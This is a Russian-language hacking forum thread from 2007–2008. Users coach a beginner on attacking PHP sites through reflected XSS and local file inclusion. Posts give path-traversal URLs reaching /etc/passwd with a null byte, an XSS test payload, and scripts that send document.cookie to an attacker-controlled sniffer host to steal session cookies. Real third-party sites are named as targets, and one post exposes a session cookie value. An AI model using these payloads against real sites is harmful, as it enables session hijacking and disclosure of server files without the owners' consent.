Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Xss? (https://forum.antichat.xyz/showthread.php?t=56009)

159932 17.12.2007 16:12
Xss?
 
http://site.ru/nw/tmp.php?url=news.htm&title=privet

"privet" выводит на странице сайта ... чо с этим мона сделать ?

dinar_007 17.12.2007 16:14
Xss

AkyHa_MaTaTa 17.12.2007 16:14
Курнул с утра...,
http://site.ru/nw/tmp.php?url=news.htm&title=privet
http://site.ru/nw/tmp.php?url=../../../../../../etc/отдай_мои_пароли&title=privet

dinar_007 17.12.2007 16:15
Цитата:
Сообщение от AkyHa_MaTaTa
Not Found
The requested URL /nw/tmp.php was not found on this server.

Apache/1.3.37 Server at users.ins.ru Port 80
Он не дал ссылку на сайт... Он привёл пример. .

159932 17.12.2007 16:19
а вот это "../../../../../.." что определяет ?

AkyHa_MaTaTa 17.12.2007 16:22
путь, но есть там иклюд или нету, хз, я хотел сказать
../../../../../etc/passwd
ошибки не выдает?

159932 17.12.2007 16:23
так я и не понил что означает ../../ и какое колво должно быть !?!?

AkyHa_MaTaTa 17.12.2007 16:27
Ошибки какие нибудь выдает? Или просто пустая страница, или
404?

159932 17.12.2007 16:58
Цитата:
Warning: include(news.hthm) [function.include]: failed to open stream: No such file or directory in /usr/hosting/u1/www/site/html/nw/tmp.php on line 228

Warning: include() [function.include]: Failed opening 'news.hthm' for inclusion (include_path='.:/u1/www/site/html') in /usr/hosting/u1/www/site/html/nw/tmp.php on line 228
вот ошибки

Jes 17.12.2007 17:03
такие сайты еще есть ? :eek: :)

159932 17.12.2007 17:04
зачем ещё !?!? мине хоть бы с этим разобраться

NOmeR1 17.12.2007 17:07
Include, Xss. Всё, что тебе нужно, ты сможешь сделать с сайтом, если конечно права есть и фильтрации нет.

scrat 17.12.2007 17:07
попробуй:
Код:
http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet

NOmeR1 17.12.2007 17:10
Цитата:
Сообщение от scrat
попробуй:
Код:
http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet
Ну нахрен ему /etc/passwd? Он инклюд только первый раз видит. Тем более там ноль байтов не нужно.

159932 17.12.2007 17:13
/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше

Spyder 17.12.2007 17:13
там помойму ремоут инклуд =\

Spyder 17.12.2007 17:14
ссылку дай лучше

159932 17.12.2007 17:36
http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=1444

freddi 17.12.2007 17:47
http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>

159932 17.12.2007 18:03
Цитата:
http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>
это я и сам обнаружил - но я всё никак понять не могу что дальше ???

ZAMUT 17.12.2007 18:06
Цитата:
Сообщение от 159932
это я и сам обнаружил - но я всё никак понять не могу что дальше ???
Это зависит от целей, которые ты преследуешь..

159932 17.12.2007 18:15
Цитата:
Это зависит от целей, которые ты преследуешь..
а вообщем что это может дать ?

ZAMUT 17.12.2007 18:17
Цитата:
Сообщение от 159932
а вообщем что это может дать ?
к примеру угон cookies

159932 17.12.2007 18:21
Цитата:
к примеру угон cookies
а как это сделать ?

Exlibris 17.12.2007 18:37
Цитата:
а как это сделать ?
<script>new image();img.src="http://site.ru/1.gif"+document.cookie;</script>

Витян 07.02.2008 03:09
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?

it's my 07.02.2008 04:56
Цитата:
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
а тебе не приходила мысль, что, что бы поймать куки нужно, что бы кто-то другой данную операцию совершил =/

krypt3r 07.02.2008 12:24
Цитата:
/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше
И не выведет, ибо SAFE MODE. Remote include тем более не прокатит, ибо настройки не позволяют. Можно инклудить лишь файлы того сайта+раскрытие директории

Digital Cat 01.03.2008 23:54
Warning: include(cash/4.dat) [function.include]: failed to open stream: No such file or directory in /home/us1958/horse.ru/www/forum/include/footer.php on line 74

If you beleive that this error is due to the server configuration problems please contact your local web-hosting support team.

Ммм... Сейчас попробую помучиться сама, вот насколько это перспективно?

http://www.horse.ru/forum/search.php?f=4
Но на сайте таких - завалиться..

Digital Cat 02.03.2008 00:02
http://www.horse.ru/forum/search.php?f=../%20&title=666666
Усе, застряла(((
Люди, что это вообще за хрень? :-/
Все-таки XSS?((

Petr 02.03.2008 01:08
Вселенское зло воцарилось в этой теме...


Время: 04:10